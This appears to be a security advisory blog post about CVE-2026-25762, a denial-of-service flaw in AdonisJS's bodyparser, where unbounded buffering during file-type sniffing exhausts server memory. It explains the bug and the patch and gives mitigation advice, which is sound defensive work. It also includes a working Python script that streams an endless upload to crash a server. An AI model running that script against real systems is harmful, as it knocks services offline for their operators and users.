Feb 8, 2026·6 min read·17 visits
The AdonisJS bodyparser tries to auto-detect file types by reading the start of a file stream. Before the patch, it didn't stop reading if it couldn't find a match. Attackers can send an endless stream of garbage, causing the server to buffer it all until it crashes from memory exhaustion.
A classic but devastating Denial of Service vulnerability in the AdonisJS framework's `@adonisjs/bodyparser` package. By exploiting the multipart file parser's eagerness to identify file types (magic numbers), an attacker can stream an infinite amount of data into a memory buffer that never flushes. This results in a rapid consumption of server RAM, triggering an Out-of-Memory (OOM) crash and effectively taking down the application with a single malicious POST request.
Modern web frameworks are like over-eager butlers. They want to do everything for you before you even ask. In the Node.js ecosystem, AdonisJS is one of the polished ones, offering a robust structure similar to Laravel or Rails. One of its conveniences is the @adonisjs/bodyparser, a middleware responsible for chewing up incoming HTTP request bodies—JSON, forms, and the heavy lifter: multipart/form-data.
Here is the scenario: You are building a file upload feature. You want to know if the user is uploading a JPEG, a PNG, or a malicious EXE. AdonisJS, trying to be helpful, attempts to "sniff" the file stream as it comes in. It peeks at the first few bytes—the "magic numbers"—to determine the MIME type automatically.
Ideally, this only takes a few bytes (e.g., FF D8 FF for a JPEG). But what happens if the framework keeps reading, and reading, and reading, waiting for a magic number that never appears? You get CVE-2026-25762. It’s not a buffer overflow in the C sense (we aren't smashing the stack), but it is a buffer bloat that is just as deadly for availability.
The root cause lies in the PartHandler logic within the bodyparser. When a file part is detected in a multipart stream, the parser pauses the flow of data to the disk (or final destination) to buffer the initial chunk for inspection. This is necessary because you can't rewind a stream easily in Node.js without buffering.
The logic roughly went like this: "Buffer incoming data chunks until we recognize the file type." The fatal flaw? There was no MAX_BUFFER_SIZE check in that specific loop.
In a healthy request, the magic numbers appear in the first 0-4100 bytes. But in a malicious request, an attacker can send a stream that effectively looks like /dev/urandom—pure entropy or just zeros—forever. Because the parser code was thinking, "I haven't seen the file signature yet, better keep buffering so I don't miss it," it accumulates the attacker's stream into the Node.js heap. Since Node.js has a default memory limit (often 2GB or 4GB depending on flags), it doesn't take long for a single connection to eat it all.
While the exact proprietary code isn't pasted here, we can reconstruct the vulnerability pattern based on the patch analysis. The vulnerable implementation behaves like a greedy stream consumer.
// Conceptual representation of the flaw
fileStream.on('data', (chunk) => {
// 1. Append new data to our internal buffer
internalBuffer = Buffer.concat([internalBuffer, chunk]);
// 2. Try to detect the file type
const type = detector.fromBuffer(internalBuffer);
if (type) {
// Success! We know what it is.
stopBufferingAndStream(internalBuffer);
} else {
// 3. THE BUG: We didn't find a type, so we just wait for more data.
// If the attacker sends 10GB of data without a magic number,
// 'internalBuffer' grows to 10GB -> OOM Crash.
return;
}
});The fix is arguably simple: stop being so optimistic. If you haven't identified the file type after looking at the first 4KB (a standard chunk size), you aren't going to find it. The patch introduces a hard limit.
// The patched logic
const MAX_SNIFF_SIZE = 4100; // Enough for almost all magic numbers
fileStream.on('data', (chunk) => {
internalBuffer = Buffer.concat([internalBuffer, chunk]);
const type = detector.fromBuffer(internalBuffer);
// MITIGATION: Check if we've exceeded the sniffing limit
if (!type && internalBuffer.length > MAX_SNIFF_SIZE) {
// Stop buffering. Assume generic binary or fail.
// This caps memory usage per request to ~4KB.
stopBufferingAndStream(internalBuffer, 'application/octet-stream');
}
});By adding that length check, the memory usage for type detection goes from $O(n)$ (where $n$ is the attacker's stream size) to $O(1)$ (constant size).
Exploiting this does not require advanced shellcode or heap grooming. You just need to be annoying. The goal is to keep the HTTP connection open and pour data into a single multipart field without ever sending a recognized header.
Here is how a researcher (or attacker) would script this using Python to visualize the attack vector:
import requests
import time
# The target endpoint handling uploads
url = 'http://localhost:3333/upload'
def infinite_stream():
# Yield chunks of 'A' forever.
# 'A' (0x41) is not a magic number for common files.
while True:
yield b'A' * 1024 * 1024 # 1MB chunks
# Sleep slightly to keep connection stable but fill RAM fast
time.sleep(0.01)
files = {'file': ('payload.bin', infinite_stream())}
try:
print("[*] Initiating memory exhaustion attack...")
# This sends a multipart request where the file body never ends
requests.post(url, files=files)
except Exception as e:
print(f"[!] Server likely crashed: {e}")On the server side, you will see the Node.js process resident set size (RSS) climb vertically. Within seconds (depending on bandwidth), the V8 engine will hit its allocation limit and abort with FATAL ERROR: Ineffective mark-compacts near heap limit Allocation failed - JavaScript heap out of memory. The server restarts, dropping all other legitimate connections.
This is a high-severity Availability issue (CVSS 7.5). While it doesn't allow data theft (Confidentiality) or data tampering (Integrity), it is arguably more annoying for operations teams. A single attacker can keep a cluster of Node.js instances in a reboot loop, effectively taking the application offline.
If you are using @adonisjs/bodyparser, you need to upgrade immediately. The fix was backported to multiple versions.
npm list @adonisjs/bodyparser10.1.3 or later.11.0.0-next.9 or later.Beyond the patch, never trust application-layer parsers blindly. Place a reverse proxy like Nginx in front of your Node.js apps. Configure client_max_body_size in Nginx. While this specific CVE exploits the buffering (meaning a small valid body could still trigger it if sent weirdly, though usually, this requires size), a hard limit on request body size is a mandatory first line of defense.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H| Product | Affected Versions | Fixed Version |
|---|---|---|
@adonisjs/bodyparser AdonisJS | < 10.1.3 | 10.1.3 |
@adonisjs/bodyparser AdonisJS | < 11.0.0-next.9 | 11.0.0-next.9 |
| Attribute | Detail |
|---|---|
| CWE ID | CWE-400 (Uncontrolled Resource Consumption) |
| CVSS | 7.5 (High) |
| Attack Vector | Network (Remote) |
| Availability Impact | High (Service Crash) |
| Exploit Status | Trivial / PoC reproducible |
| EPSS Score | 0.00012 (Low probability of mass exploitation) |
The software does not properly restrict the size or amount of resources that are requested or influenced by an actor, which can be used to consume all available resources.